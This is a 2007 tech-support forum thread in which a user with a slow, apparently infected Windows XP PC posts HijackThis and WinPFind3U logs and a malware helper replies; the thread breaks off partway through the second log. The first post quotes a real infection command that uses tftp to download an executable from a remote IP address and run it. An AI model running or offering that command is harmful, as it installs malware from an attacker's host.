Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Slow Computer - Hijackthis Logs


  • Please log in to reply
6 replies to this topic

#1 DigitalFool

DigitalFool

  • Members
  • 39 posts
  • OFFLINE
  •  
  • Local time:03:36 PM

Posted 02 June 2007 - 06:44 PM

Computer has been going really slow - ran adaware and search and destroy and cleaned up some things. Also found various weird name .exe files that all were in the system32 folder that were put there same date a few days ago - those have been deleted as I could not find any search results on them after I ended task on them. Also had many of these in my start:run history - %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET qweiht.exe & start qweiht& (this is how I knew I could be safe deleting the exe files)

My only last concern is that when I do a netstat, I see cloud.dnsprotect.com a lot and n2192837890147.netvigator.com and also when I leave my computer with no web apps open, my connection stats rise very quick both sent and received. Logs below and thanks for the help:


~~


Logfile of HijackThis v1.99.1
Scan saved at 6:37:16 PM, on 6/2/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\ISafe.exe
C:\WINDOWS\System32\CTsvcCDA.exe
C:\Program Files\Microsoft SQL Server\MSSQL$FRANKLIN_SQL_DAT\Binn\sqlservr.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\WINDOWS\System32\MsPMSPSv.exe
C:\Program Files\Wireless-G Portable USB Adapter\WLService.exe
C:\Program Files\Wireless-G Portable USB Adapter\WUSB54GP.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Viewpoint\Viewpoint Manager\ViewMgr.exe
C:\Program Files\Common Files\Dell\EUSW\Support.exe
C:\Program Files\Java\j2re1.4.2_04\bin\jusched.exe
C:\Program Files\Logitech\Video\LogiTray.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRID.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Sony Handheld\HOTSYNC.EXE
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\Program Files\Creative\SBLive\Diagnostics\diagent.exe
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Sony Handheld\USBSwt.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\LVComsX.exe
C:\Program Files\Logitech\Video\FxSvr2.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpoevm08.exe
C:\WINDOWS\System32\HPZipm12.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\Bin\hpoSTS08.exe
C:\Downloaded Full Apps\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell4me.com/myway
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://g.msn.com/0SEENUS/SAOS01
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell4me.com/myway
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.dell4me.com/myway
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: ST - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Program Files\MSN Apps\ST\01.03.0000.1005\en-xu\stmain.dll
O2 - BHO: MSNToolBandBHO - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\MSN Toolbar\01.02.5000.1021\en-us\msntb.dll
O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file)
O3 - Toolbar: MSN - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\MSN Toolbar\01.02.5000.1021\en-us\msntb.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [diagent] "C:\Program Files\Creative\SBLive\Diagnostics\diagent.exe" startup
O4 - HKLM\..\Run: [DwlClient] C:\Program Files\Common Files\Dell\EUSW\Support.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_04\bin\jusched.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe
O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [CaAvTray] "C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe"
O4 - HKLM\..\Run: [CAVRID] "C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRID.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [MoneyAgent] "C:\Program Files\Microsoft Money\System\mnyexpr.exe"
O4 - HKCU\..\Run: [LogitechSoftwareUpdate] "C:\Program Files\Logitech\Video\ManifestEngine.exe" boot
O4 - Startup: PowerReg Scheduler V3.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: D-Link AirPlus G Configuration Utility.lnk = ?
O4 - Global Startup: HotSync Manager.lnk = C:\Program Files\Sony Handheld\HOTSYNC.EXE
O4 - Global Startup: hp psc 2000 Series.lnk = C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe
O4 - Global Startup: hpoddt01.exe.lnk = ?
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: Service Manager.lnk = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
O4 - Global Startup: Sony PDA USB Switcher.lnk = C:\Program Files\Sony Handheld\USBSwt.exe
O4 - Global Startup: SonyPDA USB Switcher.lnk = C:\Program Files\Sony Handheld\USBSwt.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll (file missing)
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll (file missing)
O9 - Extra button: ICQ Pro - {6224f700-cba3-4071-b251-47cb894244cd} - C:\PROGRA~1\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\PROGRA~1\ICQ\ICQ.exe
O9 - Extra button: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Program Files\PartyPoker\PartyPoker.exe
O9 - Extra 'Tools' menuitem: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Program Files\PartyPoker\PartyPoker.exe
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {4C39376E-FA9D-4349-BACC-D305C1750EF3} (EPUImageControl Class) - http://tools.ebayimg.com/eps/wl/activex/eB...l_v1-0-3-30.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://by103fd.bay103.hotmail.msn.com/resources/MsnPUpld.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Messe...nt.cab31267.cab
O16 - DPF: {AB86CE53-AC9F-449F-9399-D8ABCA09EC09} (Get_ActiveX Control) - https://h17000.www1.hp.com/ewfrf-JAVA/Secur...loadManager.ocx
O16 - DPF: {D1E7CBDA-E60E-4970-A01C-37301EF7BF98} (Measurement Services Client v.3.7) - http://gameadvisor.futuremark.com/global/msc37.cab
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: CAISafe - Computer Associates International, Inc. - C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\ISafe.exe
O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOWS\System32\CTsvcCDA.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: spupdsvc. (Microsoft Update RunOnce Service) - Unknown owner - C:\WINDOWS\spupdsvc.exe" /service (file missing)
O23 - Service: Intel NCS NetService (NetSvc) - Intel® Corporation - C:\Program Files\Intel\NCS\Sync\NetSvc.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\System32\HPZipm12.exe
O23 - Service: VET Message Service (VETMSGNT) - Computer Associates International, Inc. - C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)
O23 - Service: WUSB54GPSVC - Unknown owner - C:\Program Files\Wireless-G Portable USB Adapter\WLService.exe" "WUSB54GP.exe (file missing)

BC AdBot (Login to Remove)

 


#2 OldTimer

OldTimer

    Malware Expert


  • Members
  • 11,092 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:North Carolina
  • Local time:03:36 PM

Posted 07 June 2007 - 02:15 PM

Hello DigitalFool and welcome to the BC HijackThis forum. I don't see any signs of viruses or malware in the log. It is clean.

Let's check with a different scanner and see if it shows anything.

Download WinPFind3u.exe to your Desktop and double-click on it to extract the files. It will create a folder named WinPFind3u on your desktop.

Note: You must be logged on to the system with an account that has Administrator privileges to run this program.
  • Close ALL OTHER PROGRAMS.
  • Open the WinPFind3u folder and double-click on WinPFind3U.exe to start the program.
  • Do not change any other settings.
  • Now click the Run Scan button on the toolbar.
  • Let it run unhindered until it finishes.
  • When the scan is complete Notepad will open with the report file loaded in it.
  • Click the Format menu and make sure that Wordwrap is not checked. If it is then click on it to uncheck it.
Use the Add Reply button and Copy/Paste the information back here. I will review it when it comes in.

If, after posting, the last line is not < End of Report > then the log is too big to fit into a single post and you will need to split it into multiple posts.

Cheers.

OT
I do not respond to PM's requesting help. That's what the forums are here for. Please use them so that others may benefit from your questions and the responses you receive.
OldTimer

Posted Image

#3 DigitalFool

DigitalFool
  • Topic Starter

  • Members
  • 39 posts
  • OFFLINE
  •  
  • Local time:03:36 PM

Posted 11 June 2007 - 10:30 PM

WinPFind3 logfile created on: 6/11/2007 9:58:46 PM
WinPFind3U by OldTimer - Version 1.0.38 Folder = C:\Documents and Settings\Admin\Desktop\WinPFind3u\
Microsoft Windows XP Service Pack 2 (Version = 5.1.2600)
Internet Explorer (Version = 6.0.2900.2180)

510.98 Mb Total Physical Memory | 177.35 Mb Available Physical Memory | 34.71% Memory free
1.22 Gb Paging File | 0.88 Gb Available in Paging File | 72.14% Paging File free
Paging file location(s): C:\pagefile.sys 1028 2056;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 36.97 Gb Total Space | 3.88 Gb Free Space | 10.50% Space Free
D: Drive not present or media not loaded
E: Drive not present or media not loaded
F: Drive not present or media not loaded

Computer Name: FAMILY
Current User Name: Admin
Logged in as Administrator.
Current Boot Mode: Normal


[Processes - Non-Microsoft Only]
a.exe -> %System32%\a.exe -> [Ver = | Size = 521728 bytes | Modified Date = 6/10/2007 2:04:02 AM | Attr = ]
cavrid.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRid.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 185456 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
cavtray.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 230512 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
ctsvccda.exe -> %System32%\CTsvcCDA.EXE -> Creative Technology Ltd [Ver = 1.0.1.0 | Size = 44032 bytes | Modified Date = 12/13/1999 2:01:00 AM | Attr = ]
diagent.exe -> %ProgramFiles%\Creative\SBLive\Diagnostics\diagent.exe -> Creative Technology Ltd [Ver = 1, 1, 4, 0 | Size = 135264 bytes | Modified Date = 4/3/2002 2:01:00 AM | Attr = ]
fxsvr2.exe -> %ProgramFiles%\Logitech\Video\FxSvr2.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 192512 bytes | Modified Date = 1/18/2005 5:08:36 PM | Attr = ]
hotsync.exe -> %ProgramFiles%\Sony Handheld\HOTSYNC.EXE -> Palm, Inc. [Ver = 4.0.1 | Size = 299008 bytes | Modified Date = 5/31/2001 9:52:46 AM | Attr = ]
hpobnz08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 323646 bytes | Modified Date = 4/9/2003 6:41:38 PM | Attr = ]
hpoevm08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpoevm08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 286720 bytes | Modified Date = 4/9/2003 6:49:36 PM | Attr = ]
hposts08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hposts08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 311296 bytes | Modified Date = 4/9/2003 6:59:24 PM | Attr = ]
hpotdd01.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe -> Hewlett-Packard [Ver = 1, 0, 0, 1 | Size = 28672 bytes | Modified Date = 4/9/2003 7:11:12 PM | Attr = ]
hpzipm12.exe -> %System32%\HPZipm12.exe -> HP [Ver = 6, 0, 0, 0 | Size = 65795 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
ipodservice.exe -> %ProgramFiles%\iPod\bin\iPodService.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 492608 bytes | Modified Date = 10/30/2006 10:36:32 AM | Attr = ]
isafe.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\iSafe.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 259184 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
ituneshelper.exe -> %ProgramFiles%\iTunes\iTunesHelper.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 256576 bytes | Modified Date = 10/30/2006 10:36:36 AM | Attr = ]
jusched.exe -> %ProgramFiles%\Java\j2re1.4.2_04\bin\jusched.exe -> [Ver = | Size = 32881 bytes | Modified Date = 2/22/2004 11:44:44 PM | Attr = ]
logitray.exe -> %ProgramFiles%\Logitech\Video\LogiTray.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 217088 bytes | Modified Date = 1/18/2005 5:37:30 PM | Attr = ]
lvcomsx.exe -> %System32%\LVCOMSX.EXE -> Logitech Inc. [Ver = 8.4.1.1092 | Size = 221184 bytes | Modified Date = 10/8/2004 11:52:32 AM | Attr = ]
notifyalert.exe -> %ProgramFiles%\Dell\Support\Alert\bin\NotifyAlert.exe -> [Ver = 2.1.0.72 | Size = 352256 bytes | Modified Date = 10/7/2003 5:20:18 PM | Attr = ]
qttask.exe -> %ProgramFiles%\QuickTime\qttask.exe -> Apple Computer, Inc. [Ver = 7.1.3 | Size = 282624 bytes | Modified Date = 10/25/2006 7:58:18 PM | Attr = ]
support.exe -> %CommonProgramFiles%\Dell\EUSW\Support.exe -> Dell [Ver = 2, 1, 1, 0 | Size = 323584 bytes | Modified Date = 5/27/2004 9:05:42 PM | Attr = ]
usbswt.exe -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
vetmsg.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 201840 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
viewmgr.exe -> %ProgramFiles%\Viewpoint\Viewpoint Manager\ViewMgr.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 112336 bytes | Modified Date = 1/4/2007 4:38:20 PM | Attr = ]
viewpointservice.exe -> %ProgramFiles%\Viewpoint\Common\ViewpointService.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 24652 bytes | Modified Date = 1/4/2007 4:38:10 PM | Attr = ]
winpfind3u.exe -> %UserDesktop%\WinPFind3u\WinPFind3U.exe -> OldTimer Tools [Ver = 1.0.38.0 | Size = 318976 bytes | Modified Date = 5/22/2007 6:27:40 PM | Attr = ]
winvnc4.exe -> %ProgramFiles%\RealVNC\VNC4\winvnc4.exe -> RealVNC Ltd. [Ver = 4.1.1 | Size = 455632 bytes | Modified Date = 3/11/2005 2:40:26 PM | Attr = ]
wlservice.exe -> %ProgramFiles%\Wireless-G Portable USB Adapter\WLService.exe -> GEMTEKS [Ver = 1, 0, 0, 4 | Size = 41025 bytes | Modified Date = 2/6/2004 10:56:14 PM | Attr = ]
wusb54gp.exe -> %ProgramFiles%\Wireless-G Portable USB Adapter\WUSB54GP.exe -> Cisco Linksys Corporation [Ver = 1.0.2.5 | Size = 4314112 bytes | Modified Date = 2/9/2004 4:38:22 PM | Attr = ]

[Win32 Services - Non-Microsoft Only]
(CAISafe) CAISafe [Win32_Own | Auto | Running] -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\iSafe.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 259184 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(Creative Service for CDROM Access) Creative Service for CDROM Access [Win32_Own | Auto | Running] -> %System32%\CTsvcCDA.EXE -> Creative Technology Ltd [Ver = 1.0.1.0 | Size = 44032 bytes | Modified Date = 12/13/1999 2:01:00 AM | Attr = ]
(dmadmin) Logical Disk Manager Administrative Service [Win32_Shared | On_Demand | Stopped] -> %System32%\dmadmin.exe -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 224768 bytes | Modified Date = 8/4/2004 2:56:48 AM | Attr = ]
(IDriverT) InstallDriver Table Manager [Win32_Own | On_Demand | Stopped] -> %CommonProgramFiles%\InstallShield\Driver\11\Intel 32\IDriverT.exe -> Macrovision Corporation [Ver = 11.00.28844 | Size = 69632 bytes | Modified Date = 4/4/2005 1:41:10 AM | Attr = ]
(iPod Service) iPod Service [Win32_Own | On_Demand | Running] -> %ProgramFiles%\iPod\bin\iPodService.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 492608 bytes | Modified Date = 10/30/2006 10:36:32 AM | Attr = ]
(Microsoft Update RunOnce Service) spupdsvc. [Win32_Own | Auto | Stopped] -> %SystemRoot%\spupdsvc.exe -> [Ver = | Size = 201708 bytes | Modified Date = 3/31/2007 11:44:28 PM | Attr = ]
(NetSvc) Intel NCS NetService [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\Intel\NCS\Sync\NetSvc.exe -> Intel® Corporation [Ver = 1.2.26.0 | Size = 143360 bytes | Modified Date = 3/3/2003 2:33:40 PM | Attr = ]
(NVSvc) NVIDIA Display Driver Service [Win32_Own | Auto | Stopped] -> %System32%\nvsvc32.exe -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 131139 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
(Pml Driver HPZ12) Pml Driver HPZ12 [Win32_Own | On_Demand | Running] -> %System32%\HPZipm12.exe -> HP [Ver = 6, 0, 0, 0 | Size = 65795 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(VETMSGNT) VET Message Service [Win32_Own | Auto | Running] -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 201840 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(Viewpoint Manager Service) Viewpoint Manager Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Viewpoint\Common\ViewpointService.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 24652 bytes | Modified Date = 1/4/2007 4:38:10 PM | Attr = ]
(WinVNC4) VNC Server Version 4 [Win32_Own | Auto | Running] -> %ProgramFiles%\RealVNC\VNC4\winvnc4.exe -> RealVNC Ltd. [Ver = 4.1.1 | Size = 455632 bytes | Modified Date = 3/11/2005 2:40:26 PM | Attr = ]
(WUSB54GPSVC) WUSB54GPSVC [Win32_Own | Auto | Running] -> %ProgramFiles%\Wireless-G Portable USB Adapter\WLService.exe -> GEMTEKS [Ver = 1, 0, 0, 4 | Size = 41025 bytes | Modified Date = 2/6/2004 10:56:14 PM | Attr = ]

[Driver Services - Non-Microsoft Only]
(a347bus) a347bus [Kernel | Boot | Running] -> %System32%\DRIVERS\a347bus.sys -> [Ver = 3.47.0.0 built by: WinDDK | Size = 160640 bytes | Modified Date = 4/30/2004 9:37:02 AM | Attr = ]
(a347scsi) a347scsi [Kernel | Boot | Running] -> %System32%\DRIVERS\a347scsi.sys -> [Ver = 3.47.0.0 built by: WinDDK | Size = 5248 bytes | Modified Date = 4/30/2004 9:33:00 AM | Attr = ]
(Abiosdsk) Abiosdsk [Kernel | Disabled | Stopped] -> -> File not found
(AFS2K) AFS2K [Kernel | System | Running] -> %System32%\drivers\AFS2K.SYS -> Oak Technology Inc. [Ver = 3.1.21.1103 | Size = 35840 bytes | Modified Date = 10/7/2004 8:16:04 PM | Attr = ]
(AliIde) AliIde [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ALIIDE.SYS -> Acer Laboratories Inc. [Ver = 1.20 | Size = 5248 bytes | Modified Date = 8/17/2001 2:51:56 PM | Attr = ]
(amdagp) AMD AGP Bus Filter Driver [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\amdagp.sys -> Advanced Micro Devices, Inc. [Ver = 5.00 (xpsp_sp2_rtm.040803-2158) | Size = 43008 bytes | Modified Date = 8/4/2004 1:07:42 AM | Attr = ]
(asc) asc [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ASC.SYS -> Advanced System Products, Inc. [Ver = 2.9I-MS (XPClient.010817-1148) | Size = 26496 bytes | Modified Date = 8/17/2001 2:52:00 PM | Attr = ]
(asc3550) asc3550 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ASC3550.SYS -> Advanced System Products, Inc. [Ver = 3.1E-MS (XPClient.010817-1148) | Size = 14848 bytes | Modified Date = 8/17/2001 2:51:58 PM | Attr = ]
(atapi) Standard IDE/ESDI Hard Disk Controller [Kernel | Boot | Running] -> %System32%\DRIVERS\atapi.sys -> [Ver = | Size = 87296 bytes | Modified Date = 4/23/2003 10:29:54 AM | Attr = ]
(Atdisk) Atdisk [Kernel | Disabled | Stopped] -> -> File not found
(bvrp_pci) bvrp_pci [Kernel | On_Demand | Stopped] -> -> File not found
(Changer) Changer [Kernel | System | Stopped] -> -> File not found
(CmdIde) CmdIde [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\CMDIDE.SYS -> CMD Technology, Inc. [Ver = 2.0.7 (XPClient.010817-1148) | Size = 6656 bytes | Modified Date = 8/17/2001 2:51:54 PM | Attr = ]
(dac2w2k) dac2w2k [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\DAC2W2K.SYS -> Mylex Corporation [Ver = 6.00-21 (XPClient.010817-1148) | Size = 179584 bytes | Modified Date = 8/17/2001 2:52:16 PM | Attr = ]
(dmboot) dmboot [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\dmboot.sys -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 799744 bytes | Modified Date = 8/4/2004 1:07:18 AM | Attr = ]
(dmio) dmio [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\dmio.sys -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 153344 bytes | Modified Date = 8/4/2004 1:07:16 AM | Attr = ]
(dmload) dmload [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\DMLOAD.SYS -> Microsoft Corp., Veritas Software. [Ver = 2600.0.503.0 | Size = 5888 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(drvmcdb) drvmcdb [Kernel | Boot | Running] -> %System32%\DRIVERS\drvmcdb.sys -> Sonic Solutions [Ver = 3.21.65a | Size = 84576 bytes | Modified Date = 7/31/2003 4:21:00 AM | Attr = ]
(drvnddm) drvnddm [File_System | Auto | Running] -> %System32%\DRIVERS\drvnddm.sys -> Sonic Solutions [Ver = 2.56.38a | Size = 40448 bytes | Modified Date = 6/20/2003 3:56:00 AM | Attr = ]
(E100B) Intel® PRO Adapter Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\e100b325.sys -> Intel Corporation [Ver = 7.0.26.0 built by: WinDDK | Size = 145408 bytes | Modified Date = 3/4/2003 1:56:26 PM | Attr = ]
(EL90XBC) 3Com EtherLink XL 90XB/C Adapter Driver [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\EL90XBC5.SYS -> 3Com Corporation [Ver = 4.05.00.0000 | Size = 66591 bytes | Modified Date = 8/17/2001 1:11:06 PM | Attr = ]
(ENTECH) ENTECH [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\Entech.sys -> EnTech Taiwan [Ver = 1.0 | Size = 20400 bytes | Modified Date = 10/21/1999 12:12:52 PM | Attr = ]
